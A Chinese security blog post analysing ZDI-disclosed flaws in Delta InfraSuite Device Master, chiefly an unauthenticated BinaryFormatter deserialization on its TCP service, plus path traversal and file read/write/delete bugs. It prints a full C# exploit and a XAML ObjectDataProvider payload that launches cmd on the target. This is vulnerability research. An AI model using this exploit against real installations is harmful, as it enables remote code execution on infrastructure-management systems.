警告
本文最后更新于 2022-11-08,文中内容可能已过时。
看到zdi发了一堆洞,有反序列化、目录穿越、权限绕过等等,还是dotnet的,于是有了此文。
ZDI爆的洞如图
data:image/s3,"s3://crabby-images/2ea4e/2ea4e65a5b2257f12fdd4db745f3a919dc82b0c4" alt="image.png"
exe对应端口
1
2
3
| C:\Program Files\InfraSuite Device Master\Device-DataCollect\Device-DataCollect.exe 3000
C:\Program Files\InfraSuite Device Master\Device-Gateway\Device-Gateway.exe 3100 3110
C:\Program Files\InfraSuite Device Master\Device-Gateway\Device-Gateway.exe 80 443
|
https://www.zerodayinitiative.com/advisories/ZDI-22-1478/
这个漏洞在3100和3110端口
从TCP服务器到业务处理的逻辑如下
data:image/s3,"s3://crabby-images/09d44/09d44c55eb026a70578b5e11ed1c32b1c676bafc" alt="image.png"
StartGatewayOperation中设置了网关服务的一些配置
data:image/s3,"s3://crabby-images/010e6/010e61ec589408930961109f817930980ce1a1ce" alt="image.png"
初始化TCP端口
data:image/s3,"s3://crabby-images/35820/35820662c6f8032f00aab78cf42a17110d2e61a0" alt="image.png"
监听IPv4 v6,端口DEFAULT_TCP_PORT
data:image/s3,"s3://crabby-images/1b1c4/1b1c42207a3f52cc7a3174403ca04e5360dd5c5a" alt="image.png"
this.InitialWebEngine()中配置了web服务器
data:image/s3,"s3://crabby-images/eea98/eea98f0f3b0967e906a46dfc7d3b3f763088e018" alt="image.png"
在StartControlLayer中起worker线程跑业务逻辑
data:image/s3,"s3://crabby-images/1c832/1c83284bd950f3509c1312d4f3c96290b097a7c3" alt="image.png"
也就是MainLoop
data:image/s3,"s3://crabby-images/66190/66190f63f8f6e7adb07d7d475ae65c04fb6de7f0" alt="image.png"
在DoUpperLayerNWPacket中根据PacketData的sHeader字段的i32PayloadType进行switch case。
data:image/s3,"s3://crabby-images/8d97f/8d97fe81d05bfd52ecb0595c52f728a280258d4a" alt="image.png"
随便进入一个case
data:image/s3,"s3://crabby-images/73fc6/73fc6adccc9173e298d81113f3c40a31d328992f" alt="image.png"
看到 Serialization.DeSerializeBinary(sPacket.payload, out obj)
data:image/s3,"s3://crabby-images/e0f9d/e0f9dd05a487f56a25f3a8b262e9dda7e1dafb78" alt="image.png"
直接binaryformatter,没啥好说的。关键点在于怎么构造payload。
构造需要研究其tcp的处理逻辑,在ControlLayerMngt的构造函数中
data:image/s3,"s3://crabby-images/49d92/49d92e2fd2db57d5879f83f3bf9609564a02a304" alt="image.png"
初始化了一个TCPServerConnectionMngt,在ModuleInitialization中定义了TCP链接的send和receive事件。
data:image/s3,"s3://crabby-images/1a3a2/1a3a259ed192c681df2d43ce837e8692805bf5b4" alt="image.png"
我们发送给server的请求是receive事件,被ReceiveCallBack处理。
data:image/s3,"s3://crabby-images/8367b/8367beee1479c3ad7b752483a4c0762d9df98e57" alt="image.png"
分别进行add、check操作
在add中将传入的buffer赋予自身this._gRxPacketBytesBuffer,变长存储字节数据。
data:image/s3,"s3://crabby-images/cb619/cb619a226e764809508d4b14aa081354c510ae3e" alt="image.png"
check中检查数据包格式,重组PacketData对象
data:image/s3,"s3://crabby-images/0bdfa/0bdfa7a4452fece27887f855bc7e2e4dafcfb795" alt="image.png"
并调用this.AddRxPacket(packetData)将重组的packet对象加入this._gRxPacketList
data:image/s3,"s3://crabby-images/32836/32836c2082c71a869d20fd6e5ba80c3de272b97c" alt="image.png"
回看MainLoop
data:image/s3,"s3://crabby-images/16cba/16cbaeb54694bd8c9080e30bf1428b99f66ccd2f" alt="image.png"
this.CheckUpperLayerNWPacket();
this.DoUpperLayerNWPacket();
Check调用ReceivePacket判断this._gRxPacketList中是否有数据包
data:image/s3,"s3://crabby-images/17a50/17a505b11b1437983c305d480962cb19e209c64f" alt="image.png"
ReceivePacket调用GetFirstRxPacket拿到第一个数据包packet
data:image/s3,"s3://crabby-images/c8839/c8839e05b762e7ce4cd5520a8e27658015069aef" alt="image.png"
然后调用this._gUpperLayerNWPacketQueue.AddToSyncQueue(packetData)将数据包加入到同步队列中。
DoUpperLayerNWPacket就是拿到队列中的第一个数据包
data:image/s3,"s3://crabby-images/51a21/51a2134f02c75d67fc43f950c90ed73984e18797" alt="image.png"
到这里的话就随便进入一个case,拿CtrlLayerNWCmd_FileOperation举例
data:image/s3,"s3://crabby-images/85674/8567442ee8032213147ea5d5294eeb3857ac02fa" alt="image.png"
将PacketData的payload字段反序列化回来,转为CtrlLayerNWCommand_FileOperation业务对象从而进行下一步业务处理。
那么到此,我们基本明白了其架构。
data:image/s3,"s3://crabby-images/ada5a/ada5a846903e62ea367bdc0cbcf0eb1423c5a818" alt="image.png"
那么写EXP完全照搬就行了。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
| using InfraSuiteManager.Common;
using System;
using System.IO;
using System.Runtime.Serialization;
using Microsoft.VisualStudio.Text.Formatting;
using System.Net.Sockets;
namespace ConsoleApp1
{
internal class Program
{
[Serializable]
public class TextFormattingRunPropertiesMarshal : ISerializable
{
protected TextFormattingRunPropertiesMarshal(SerializationInfo info, StreamingContext context)
{
}
string _xaml;
public void GetObjectData(SerializationInfo info, StreamingContext context)
{
Type typeTFRP = typeof(TextFormattingRunProperties);
info.SetType(typeTFRP);
info.AddValue("ForegroundBrush", _xaml);
}
public TextFormattingRunPropertiesMarshal(string xaml)
{
_xaml = xaml;
}
}
static void Main(string[] args)
{
string xaml_payload = File.ReadAllText(@"1.txt");
TextFormattingRunPropertiesMarshal payload = new TextFormattingRunPropertiesMarshal(xaml_payload);
PacketData packet = new PacketData();
PacketOperation packetOperation = new PacketOperation();
if (!Serialization.SerializeBinary(payload, out packet.payload))
{
Console.WriteLine("serialize error.");
}
packet.sHeader.i32PayloadSize = packet.payload.Length;
byte[] byTxPacket;
packetOperation.MakePacketBytes(packet, out byTxPacket);
TcpClient tcpClient = new TcpClient("172.16.9.136", 3000);
NetworkStream stream = tcpClient.GetStream();
var b = new BinaryWriter(stream);
b.Write(byTxPacket);
stream.Close();
tcpClient.Close();
Console.WriteLine("done.");
Console.ReadKey();
}
}
}
|
1
2
3
4
5
6
7
8
9
10
| <?xml version="1.0" encoding="utf-16"?>
<ObjectDataProvider MethodName="Start" IsInitialLoadEnabled="False" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:sd="clr-namespace:System.Diagnostics;assembly=System" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml">
<ObjectDataProvider.ObjectInstance>
<sd:Process>
<sd:Process.StartInfo>
<sd:ProcessStartInfo Arguments="/c notepad" StandardErrorEncoding="{x:Null}" StandardOutputEncoding="{x:Null}" UserName="" Password="{x:Null}" Domain="" LoadUserProfile="False" FileName="cmd" />
</sd:Process.StartInfo>
</sd:Process>
</ObjectDataProvider.ObjectInstance>
</ObjectDataProvider>
|
data:image/s3,"s3://crabby-images/fc084/fc08415e995b3ab988cadb3e59dda542a3f489b0" alt="image.png"
对于Device-DataCollect 根据packetData.sHeader.i32PayloadType
可以case到1
data:image/s3,"s3://crabby-images/0e5db/0e5db2ffae124a864d70cd68021280f869bc9a6e" alt="image.png"
InfraSuiteManager.DataCollectionLayer.DataCollectionLayerMngt.DCLNWCmd_DCServerStatus(ref PacketData)
这个地方有反序列化
data:image/s3,"s3://crabby-images/dac33/dac336a8d6c89b3683fb33c00549cbe53186244a" alt="image.png"
构造payload不写了,Device-DataCollect和Device-Gateway架构差不多。同样用PacketOperation构造packet数据包就行了。
其他的洞就是case不一样,以下就只写漏洞点所在了。
InfraSuiteManager.ControlLayer.ControlLayerMngt.CtrlLayerNWCmd_FileOperation(ref PacketData)
data:image/s3,"s3://crabby-images/de4a0/de4a0a6ce26c2c278427fbf73317a3193861a2e4" alt="image.png"
fileName参数可控导致跨目录任意文件写入+任意文件删除
data:image/s3,"s3://crabby-images/9f281/9f28134da36fc284591dffb22f06724b5adc8b2b" alt="image.png"
fileName参数导致任意文件读取
没看出来,感觉是解压目录穿越
data:image/s3,"s3://crabby-images/00bd6/00bd6024f12d1eb9f0497f0bef52806035d06885" alt="image.png"
data:image/s3,"s3://crabby-images/383af/383af4c3723358a49b361b6947e2946fa4b308f4" alt="image.png"
data:image/s3,"s3://crabby-images/c052f/c052f1e3cae6be1eff13b12ac709d21b35e0b743" alt="image.png"
很经典的dotnet tcp server的漏洞,尤其是server对于tcp packet的处理和业务逻辑的关联梳理,让我对dotnet的理解更进一步。
文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。